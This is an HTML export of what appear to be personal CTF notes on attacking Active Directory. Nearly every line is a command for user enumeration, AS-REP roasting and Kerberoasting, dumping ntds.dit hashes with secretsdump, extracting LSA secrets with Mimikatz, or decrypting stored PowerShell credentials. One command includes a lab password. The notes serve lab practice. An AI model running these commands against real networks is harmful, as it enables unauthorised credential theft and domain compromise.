<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>kerberute</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>kerberute</h1>

      <div class="ck-content">
        <p><a href="https://book.hacktricks.xyz/windows/active-directory-methodology">https://book.hacktricks.xyz/windows/active-directory-methodology</a> </p><pre><code class="language-text-plain">crackmapexec smb dc.ustoun.local -u 'guest' -p '' --rid-brute</code></pre>

        <p>for user enumeration use:</p><pre><code class="language-text-plain">./kerbrute userenum --dc $ip -d raz0rblack.thm fnames.txt </code></pre>

        <p><a href="https://wadcoms.github.io/#+Username+Password+Linux+Exploitation+SMB">https://wadcoms.github.io/#+Username+Password+Linux+Exploitation+SMB</a> </p>
        <p>If you know one user, you can find others with </p>
        <p><code>GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username</code> or <code>enum4linux -a -u "user" -p "password" &lt;DC IP&gt;</code>

        </p>
        <p>for finding krb5tgt hashes, use </p><pre><code class="language-text-plain">python3 GetNPUsers.py windcorp.thm/ -no-pass -usersfile ../../../windcorp/valid_users.txt</code></pre>

        <p><code>python3 GetUserSPNs.py -usersfile ../../valid_users.txt -no-pass -dc-ip 10.10.75.185 raz0rblack.thm/twilliams:roastpotatoes</code>

        </p>
        <p><code>./secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL</code>

        </p>
        <p>for poweshell session, use mimikatz as </p>
        <p><code>Invoke-Mimikatz -Command '"lsadump::lsa /patch"'</code>

        </p>
        <p><a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-credential?view=powershell-7.2">https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-credential?view=powershell-7.2</a> </p>
        <p>https://stackoverflow.com/questions/63639876/powershell-password-decrypt </p>
        <p>encrypted passwords in powershell credential object</p>
        <p><code>$Credential = Import-Clixml -Path "lvetrova.xml"</code>

        </p>
        <p><code>$Credential.GetNetworkCredential().password</code>

        </p>
      </div>
    </div>
  </body>

</html>